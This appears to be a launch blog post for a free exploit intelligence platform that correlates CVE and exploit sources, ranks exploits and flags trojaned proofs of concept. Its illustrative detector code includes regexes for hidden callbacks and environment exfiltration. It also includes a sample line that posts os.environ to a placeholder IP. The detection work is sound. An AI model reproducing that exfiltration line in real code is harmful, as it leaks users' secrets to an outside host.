Let’s be honest about the state of public exploit intelligence: it’s a mess.
The Problem Nobody Talks About
Every security professional has lived this. A critical CVE drops. You need to know: is there a public exploit? Does it actually work? Is it relevant to my environment? Simple questions. You’d think the answers would be easy to find.
They’re not.
The NVD gives you metadata - CVSS scores, CWE classifications, affected product lists. Useful, but it won’t tell you if someone’s already weaponized the vulnerability. For that, you need exploit databases. And this is where things get uncomfortable.
The public exploit archives have a quality problem. Browse through them and you’ll find proofs of concept that were never tested, scripts that target the wrong version, code that doesn’t compile, and - this is the part that really gets us - exploits that are straight-up backdoored. Repositories with hundreds of GitHub stars contain obfuscated reverse shells buried in “helper” functions. People download these things and run them on their assessment machines. Researchers, pentesters, defenders trying to validate whether they’re vulnerable - and the tool they’re using to check is itself malicious.
Nobody talks about this enough. The community treats exploit archives like trusted infrastructure, but the reality is that most public exploit code has never been verified by anyone. There’s no peer review. No quality gate. You’re on your own.
Meanwhile, the data you actually need is scattered across a dozen sources that don’t talk to each other. NVD has the CVE. EPSS has the exploitation probability. CISA KEV has the confirmed-in-the-wild list. Metasploit has peer-reviewed modules. ExploitDB has a massive archive. GitHub has thousands of PoCs. None of them give you the complete picture. You want to answer “should I care about this CVE?” and you need six browser tabs and twenty minutes.
We got tired of the tab-switching. So we built EIP.
What EIP Actually Does
The Exploit Intelligence Platform pulls from 16 sources, correlates everything by CVE, and gives you the full picture in one place. The usual suspects are all here - NVD for metadata, CISA KEV for confirmed in-the-wild exploitation, EPSS for 30-day exploitation probability, ExploitDB for the archive (warts and all), Metasploit for the gold standard in peer-reviewed modules, and GitHub for the wild west of PoC repositories. But also VulnCheck KEV with ransomware attribution, InTheWild.io for crowd-sourced exploitation signals, ENISA’s EU database, OSV.dev for kernel version ranges, Nuclei for scanner templates, and GHSA for package ecosystem advisories.
Sixteen sources, each on its own ingestion schedule. The pipeline normalizes the data, deduplicates it, correlates everything to CVE IDs, and - this is the part we care about most - ranks exploits by quality.
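The correlate-and-deduplicate step can be sketched in a few lines of Python. This is an illustration, not EIP’s actual schema or code: the record fields (`cve`, `source`, `url`) and the dedup key are assumptions for the example.

```python
from collections import defaultdict

def correlate(records):
    """Group normalized records by CVE ID and deduplicate by
    (source, url) so repeated crawls don't double-count an exploit."""
    by_cve = defaultdict(dict)
    for rec in records:
        key = (rec["source"], rec["url"])  # same source + same artifact = duplicate
        by_cve[rec["cve"]].setdefault(key, rec)
    # flatten back to one list of unique records per CVE
    return {cve: list(seen.values()) for cve, seen in by_cve.items()}

records = [
    {"cve": "CVE-2024-0001", "source": "exploitdb", "url": "edb/1"},
    {"cve": "CVE-2024-0001", "source": "exploitdb", "url": "edb/1"},  # repeat crawl
    {"cve": "CVE-2024-0001", "source": "github",    "url": "gh/poc"},
]
merged = correlate(records)
# merged["CVE-2024-0001"] now holds two unique records, not three
```

The same shape scales to any number of feeds: each source’s normalizer emits records in this common form, and correlation is just a grouped merge.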
Not all exploits are created equal. A Metasploit module has been peer-reviewed, tested across environments, and maintained by the community. A random GitHub repo with a poc.py that appeared twelve hours after the CVE dropped? That could be a working exploit, a broken sketch, or a credential stealer wearing a trenchcoat. EIP makes this hierarchy explicit: Metasploit first, then verified ExploitDB entries, then GitHub PoCs ranked by stars and community signals, with flagged trojans at the bottom where they belong.
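The hierarchy above can be expressed as a simple sort: trusted source tier first, community signal (stars) as a tiebreaker, flagged trojans last. The tier values and field names here are illustrative, not EIP’s actual scoring model.

```python
# Lower tier value sorts first; unknown sources land mid-pack.
TIER = {"metasploit": 0, "exploitdb_verified": 1, "github": 2, "flagged_trojan": 9}

def rank(exploits):
    """Order exploits by source tier, then by GitHub stars (descending)."""
    return sorted(exploits, key=lambda e: (TIER.get(e["source"], 5), -e.get("stars", 0)))

pool = [
    {"name": "poc.py",     "source": "github",             "stars": 430},
    {"name": "ms_module",  "source": "metasploit"},
    {"name": "edb_42",     "source": "exploitdb_verified"},
    {"name": "free_shell", "source": "flagged_trojan",     "stars": 900},
]
ordered = [e["name"] for e in rank(pool)]
# ordered == ["ms_module", "edb_42", "poc.py", "free_shell"]
```

Note what the tiebreaker does and doesn’t do: stars only matter within a tier, so a 900-star flagged trojan still sorts below an unstarred Metasploit module.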
The AI Layer
Ranking by source gets you partway there. But the quality problem runs deeper than provenance.
We run every exploit through AI analysis that classifies it across multiple dimensions - what kind of attack it is (RCE, SQLi, XSS, privilege escalation), how complex the exploit is, how reliable it is, what software it targets, and what MITRE ATT&CK techniques it maps to. More importantly, the analysis flags deception indicators: obfuscated payloads, hidden callbacks, credential exfiltration disguised as “connectivity checks.”
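To make the idea of deception indicators concrete, here is a deliberately simplified heuristic scan. The real pipeline uses AI analysis; these three regexes are toy stand-ins for the indicator categories named above, and the indicator names are invented for this example.

```python
import re

# Toy heuristics, loosely mirroring the indicator categories above.
INDICATORS = {
    "long_base64_blob": re.compile(r"[A-Za-z0-9+/]{120,}={0,2}"),
    "hidden_callback":  re.compile(r"(curl|wget|requests\.(get|post))\s*\(?\s*['\"]https?://"),
    "env_exfiltration": re.compile(r"os\.environ|getenv\("),
}

def flag_deception(source_code: str) -> list[str]:
    """Return the names of every indicator that matches the exploit source."""
    return [name for name, pat in INDICATORS.items() if pat.search(source_code)]

# A fake "PoC" that smuggles environment variables to a hardcoded host
# (198.51.100.7 is a documentation address, per RFC 5737):
poc = 'payload = "' + "QUFB" * 50 + '"\n' \
      'requests.post("http://198.51.100.7/c", data=os.environ)'
hits = flag_deception(poc)
# hits -> ["long_base64_blob", "hidden_callback", "env_exfiltration"]
```

A real classifier has to go far beyond pattern matching - obfuscation exists precisely to defeat regexes - but even this sketch shows why automated review catches things a quick skim of `poc.py` does not.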
Out of 73K+ exploits analyzed so far, we’ve caught hundreds of trojans. These aren’t edge cases - they’re repos that show up in search results when people look for PoCs for real vulnerabilities. Some have significant star counts. The trojan detection post goes deeper into this, but the short version is: if you’re pulling exploit code from public sources and running it without review, you should probably stop doing that.
The Numbers
As of today: 354K+ CVEs. 115K+ exploits correlated to 52K+ vulnerabilities. 4,600+ CVEs confirmed exploited in the wild. 565 with confirmed ransomware use. Nearly 4,000 Nuclei templates. 37K+ vendors and 41K+ exploit authors tracked.
Those numbers change daily. EPSS scores refresh every 24 hours. New CVEs from NVD arrive within hours of publication. Exploit sources are crawled on regular intervals. When you query EIP for a CVE, you get the current state of knowledge - not last week’s snapshot and definitely not last quarter’s spreadsheet.
Why It’s Free
This is a non-commercial project. There’s no paid tier, no enterprise upsell, no “contact sales for the full data.” The API has rate limits to keep things fair, but the data is open.
We built this because we needed it. The tools that existed didn’t give us what we wanted - and the ones that came close were either paywalled, poorly maintained, or hadn’t been updated since the Obama administration. The security community deserves an exploit intelligence source that’s fast, trustworthy, and doesn’t treat basic vulnerability context as a premium feature.
Old-school spirit, modern infrastructure. Built for responsible research and authorized testing. That’s it.
What’s Next
The AI analysis pipeline keeps expanding. More exploit sources are being integrated. The MCP server already lets AI assistants query the full platform directly - which led to some unexpected results we’ll be writing about soon.
This blog is where we’ll share what we learn along the way. If you’ve been frustrated by the same problems we were - the tab-switching, the unverified PoCs, the constant question of “but does this actually work?” - give the platform a look. If you find something broken, tell us. If you build something interesting on top of it, we’d love to hear about it.